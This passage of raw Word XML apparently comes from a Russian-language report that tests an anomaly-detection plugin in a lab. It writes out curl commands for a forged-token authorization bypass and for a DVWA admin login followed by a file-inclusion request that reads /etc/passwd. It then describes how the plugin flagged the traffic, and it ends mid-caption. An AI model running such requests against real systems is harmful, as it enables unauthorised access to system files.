        <w:t>curl- H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.fake. fake" \ </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidRPr="000A1CD6">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http://192.168.0.104:5000/api/users</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="128A3C83" w14:textId="77777777" w:rsidR="004C410D" w:rsidRPr="00EB463F" w:rsidRDefault="004C410D" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:round/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BA0EE1" w14:textId="2B0F6212" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:round/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:round/>
          </w14:textOutline>
        </w:rPr>
        <w:t xml:space="preserve">Процесс обнаружения такой атаки показан на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:round/>
          </w14:textOutline>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:round/>
          </w14:textOutline>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C43B0D" w14:textId="77777777" w:rsidR="00D70BA9" w:rsidRPr="00C43929" w:rsidRDefault="00D70BA9" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:round/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D9AA92" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D70BA9" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="629D8622" wp14:editId="502FB65E">
            <wp:extent cx="5723890" cy="2028825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1586639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39516" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5723890" cy="2028825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B41F63A" w14:textId="031A0EE9" w:rsidR="005D6C1B" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Обнаружение попытки обхода авторизации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4758FE50" w14:textId="77777777" w:rsidR="004C410D"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Как показано на рисунке плагин успешно обозначил данную сетевую активность как аномальную, но в журнале аудита записей не появилось. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0541A99B" w14:textId="5BD4AF73" w:rsidR="008E0171" w:rsidRPr="00D70BA9" w:rsidRDefault="000A1CD6" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.5.2 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сценарий 2 —</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00C43929">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Несанкционированный доступ к веб-приложению DVWA</w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00C43929">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В данном сценарии атакующий сначала авторизовался в веб-приложении DVWA под учётными данными администратора, после чего использовал полученную сессию для эксплуатации уязвимости включения файлов с целью чтения системных </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файлов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EFC8AD" w14:textId="77777777" w:rsidR="00D70BA9" w:rsidRPr="00D70BA9" w:rsidRDefault="00D70BA9" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43145149" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D70BA9" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Curl</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> c cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>txt </w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> d </w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:round/>
          </w14:textOutline>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidRPr="00D70BA9">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http</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
              <w14:noFill/>
              <w14:prstDash w14:val="solid"/>
              <w14:round/>
            </w14:textOutline>
          </w:rPr>
          <w:t>://192.168.0.104/</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">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login</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
              <w14:noFill/>
              <w14:prstDash w14:val="solid"/>
              <w14:round/>
            </w14:textOutline>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">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php curl</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
              <w14:noFill/>
              <w14:prstDash w14:val="solid"/>
              <w14:round/>
            </w14:textOutline>
          </w:rPr>
          <w:t>- </w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">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b cookies</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
              <w14:noFill/>
              <w14:prstDash w14:val="solid"/>
              <w14:round/>
            </w14:textOutline>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">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txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="00D70BA9">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http</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
              <w14:noFill/>
              <w14:prstDash w14:val="solid"/>
              <w14:round/>
            </w14:textOutline>
          </w:rPr>
          <w:t>://192.168.0.104/</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">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vulnerabilities</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
              <w14:noFill/>
              <w14:prstDash w14:val="solid"/>
              <w14:round/>
            </w14:textOutline>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">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fi</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
              <w14:noFill/>
              <w14:prstDash w14:val="solid"/>
              <w14:round/>
            </w14:textOutline>
          </w:rPr>
          <w:t>/?</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">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page</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
              <w14:noFill/>
              <w14:prstDash w14:val="solid"/>
              <w14:round/>
            </w14:textOutline>
          </w:rPr>
          <w:t>=../../</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">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etc</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
              <w14:noFill/>
              <w14:prstDash w14:val="solid"/>
              <w14:round/>
            </w14:textOutline>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="00D70BA9">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passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16537EB0" w14:textId="77777777" w:rsidR="00D70BA9" w:rsidRPr="00D70BA9" w:rsidRDefault="00D70BA9" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7F3D46" w14:textId="70ECBE0D"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D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака выполнялась через зашифрованные HTTP-запросы, содержимое которых недоступно для сигнатурного анализа. Процесс обнаружения показан на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0" w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155EABE1" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C43929" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF49D8B" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D70BA9" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51742331" wp14:editId="6F76EFFB">
            <wp:extent cx="5690235" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:docPr id="1656544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44924" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5690235" cy="2771775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="224CD04A" w14:textId="59FF614C" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="004961D0" w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
